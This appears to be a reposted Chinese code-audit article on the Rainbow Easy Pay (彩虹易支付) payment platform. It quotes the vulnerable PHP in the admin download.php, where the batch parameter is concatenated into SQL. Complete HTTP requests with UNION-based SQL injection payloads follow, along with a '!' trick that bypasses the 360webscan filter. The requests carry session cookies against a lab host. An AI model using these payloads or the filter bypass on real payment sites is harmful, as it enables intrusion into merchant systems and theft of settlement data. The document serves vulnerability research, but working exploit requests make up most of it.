环境搭建
链接: https://pan.baidu.com/s/1e5D4wWydTuv90s98nRd1Wg?pwd=ege5 提取码: ege5 
/install
一步步安装即可
后台sql注入
admindownload.php
$type = isset($_GET['type'])?trim($_GET['type']):'common';$batch=$_GET['batch'];$remark = text_encoding($conf['transfer_desc']);if($type == 'mybank'){$data="收款方名称,收款方账号,收款方开户行名称,收款行联行号,金额,附言/用途rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and (type=1 or type=4) order by id asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=text_encoding($row['username']).','.$row['account'].','.($row['type']=='1'?'支付宝':'').',,'.$row['realmoney'].','.$remark."rn"; }}elseif($type == 'alipay'){$data="支付宝批量付款文件模板rn";$data.="序号(必填),收款方支付宝账号(必填),收款方姓名(必填),金额(必填,单位:元),备注(选填)rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and type=1 order by id asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=$i.','.$row['account'].','.text_encoding($row['username']).','.$row['realmoney'].','.$remark."rn"; }}elseif($type == 'wxpay'){if(!$conf['transfer_wxpay'])sysmsg(mb_convert_encoding("未开启微信企业付款", "UTF-8", "GB2312"));$channel = libChannel::get($conf['transfer_wxpay']);if(!$channel)sysmsg(mb_convert_encoding("当前支付通道信息不存在", "UTF-8", "GB2312"));$wxinfo = libChannel::getWeixin($channel['appwxmp']);if(!$wxinfo)sysmsg(mb_convert_encoding("支付通道绑定的微信公众号不存在", "UTF-8", "GB2312"));$rs=$DB->query("SELECT * from pre_settle where batch='$batch' and type=2 order by id asc");$i=0;$table="商家明细单号(必填),收款用户openid(必填),收款用户姓名(选填),收款用户身份证(选填),转账金额(必填,单位:元),转账备注(必填)rn";$allmoney = 0;while($row = $rs->fetch()) {$i++;$table.=$batch.$i.','.$row['account'].','.text_encoding($row['username']).',,'.$row['realmoney'].','.$remark."rn";$allmoney+=$row['realmoney']; }$data="微信支付批量转账到零钱模版(勿删)rn";$data.="商家批次单号(必填),".$batch."rn";$data.="批次名称(必填),批量转账".$batch."rn";$data.="转账appid(必填),".$wxinfo['appid']."rn";$data.="转账总金额(必填,单位:元),".$allmoney."rn";$data.="转账总笔数(必填),".$i."rn";$data.="批次备注(必填),批量转账".$batch."rn";$data.=",rn";$data.="转账明细(勿删)rn";$data.=$table;}else{$data="序号,收款方式,收款账号,收款人姓名,付款金额(元),付款理由rn";$rs=$DB->query("SELECT * from pre_settle where batch='$batch' order by type asc,id asc");$i=0;while($row = $rs->fetch()) {$i++;$data.=$i.','.display_type($row['type']).','.$row['account'].','.text_encoding($row['username']).','.$row['realmoney'].','.$remark."rn"; }}
$batch 变量直接拼接到sql语句中
GET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&type=mybank HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dgufGET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&type=alipay HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dgufGET /admin/download.php?act=settle&batch=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dguf
绕过360webscan.php
在union联合注入中,使用! 绕过 360webscan
GET /admin/download.php?act=settle&batch=1%27+UNION+SELECT%21NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cuser%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1Host: 192.168.18.137Cookie:admin_token=784ag3L7qUdyusDsuZFjjiMPEioWuBrGLLSeKznpgDF7S6b4Co%2F2CgodQTQJki5xqVUfoJRqPKf0ZPmA0obGDV5hn8x8UBBjHuj%2Bxf2c; PHPSESSID=c0b3np93q5i1c1q8gin236dguf
原文始发于微信公众号(安全逐梦人):彩虹易支付代码审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论